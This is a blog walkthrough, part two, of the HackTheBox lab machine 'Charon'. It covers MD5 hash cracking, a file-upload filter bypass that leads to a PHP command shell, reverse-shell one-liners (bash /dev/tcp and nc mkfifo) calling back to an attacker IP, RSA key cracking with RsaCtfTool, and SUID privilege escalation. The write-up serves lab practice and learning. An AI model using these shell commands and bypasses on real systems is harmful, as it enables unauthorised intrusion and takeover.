HTB:Charon渗透测试(二)

简介: HTB:Charon渗透测试

4.md5解密

super_cms_adm:0b0689ba94f94533400f4decd87fa260,decoder:5f4dcc3b5aa765d61d8327deb8

14548f87e6b8fa30678898d2066b79a0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.文件上传

成功登录之后,发现存在一个上传地址。

a35472b8a9ab4721a56692db9f6f1d7b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

对php格式的文件进行测试,发现不能成功上传。

54ad029b5e25c3a858388abb193d110a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

测试.php.jpg格式的文件进行上传,可以上传不能解析。

服务器通常通过三种方式过滤文件类型:

  • 文件扩展名
  • 内容类型
  • 魔术字节/MIME 类型

我已经用 提交了这个Content-Type: image/jpeg,所以它必须不止于此。该消息表明它正在限制扩展。如果我只是上传cmd.jpg而不更改名称,它仍然会报错。

6.文件上传bypass

发现返回包,存在一个字段类似于base64加密的。

70ccaecb79ae528e229fe7f39519b656_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用echo进行base64解密。

fcc3bf20c1d0656b274f55c4b5297e05_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后修改name格式,进行上传。

2e67321c888a4c370512331d02c28110_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

不能成功上传。

3548a88994fe51bfea9431ddad364354_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后先设置burp,接收响应包的内容。

1.修改前端代码绕过文件上传

将name修改为testfile1

aada8ddc1d9780ff1c7285143005ab79_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后输入cmd.php,重新上传.php.jpg格式的文件。成功上传。

ab54c04268553f348c66a7c0f3dae746_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.命令执行

在上传之后可以利用cmd去执行一些命令。

2de3334e22f06dcbac4fca7108d6473d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

三、权限提升

7.使用bash反弹shell

bash -c 'bash -i >%26 /dev/tcp/10.10.16.2/443 0>%261
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 443 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

b1eda19d634e31e481e03675ffa70449_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

nc进行监听

9460fffa7c9f847cb8809ea4645fe4ef_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功反弹shell。

47eefc10a572dd35054ad5917bcaadbb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

翻文件,发现在home/decoder目录下存在2个密钥。

8.使用nc下载文件

30bdd1c8082c90515dc6b7b338e71d2b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

12c0f4e1c5520a730d3caaa8c3b8bf0e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

9.密钥解密

6602cd389dfa8351ccea1b1b849f592f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用RsaCtfTool进行暴力破解

安装步骤:

(sudo apt install libmpc-dev libgmp3-dev sagemath和pip3 install -r requirements.txt)

4d14183ab7d9d3b7988f87f0f273c67d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功解密。

68fb6a4fe1cd553b9246d8f396568a1e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

10.ssh远程登录

获取第一个flag(user.txt)。

f91fec0199928c4eb9e131ab5e53af98_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

11、使用find命令,查找可利用的suid文件

find / -perm-4000-ls 2>/dev/null

a0aead00459c3c0354f1e0cf54d6c918_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现supershell可以利用。

3c405d94dac6d8226a2343ddd8b56827_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用supershell成功读到了root.txt,成功获得了第二个flag。

52d81633e725939b9faca1579a3bad02_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总结:

这个靶机难度是中等难度,但是给我带来了很多的知识点,也学到了很多。靶机的操作流程就是信息收集,从端口扫描到目录枚举,漏洞利用主要是sql注入,文件上传及手工union查询bypasswaf和文件上传的绕过。绕过之后进行反弹shell,反弹shell之后,翻文件,翻到了2个密钥,使用工具进行暴力破解,接着ssh远程登录,使用find命令查找可用的用法,然后使用其用法读到了root.txt文件的内容。靶机难度还是有的,也有很多新知识,建议有时间的小伙伴可以试试。

相关文章
|
网络协议 Linux 网络安全
记一次对HTB:Timelapse的渗透测试
记一次对HTB:Timelapse的渗透测试
221 0
记一次对HTB:Timelapse的渗透测试
|
SQL 安全 Linux
HTB:Charon渗透测试(一)
HTB:Charon渗透测试
143 0
HTB:Charon渗透测试(一)
|
安全 Shell 网络安全
HTB:Obscurity渗透测试(二)
HTB:Obscurity渗透测试
118 0
HTB:Obscurity渗透测试(二)
|
网络安全 Python
HTB:Obscurity渗透测试(一)
HTB:Obscurity渗透测试
137 0
HTB:Obscurity渗透测试(一)
|
3月前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
73 3
|
3月前
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
77 2
|
3月前
|
Python Windows 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
91 2
|
3月前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
64 2
|
20天前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
53 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
2月前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现

热门文章

最新文章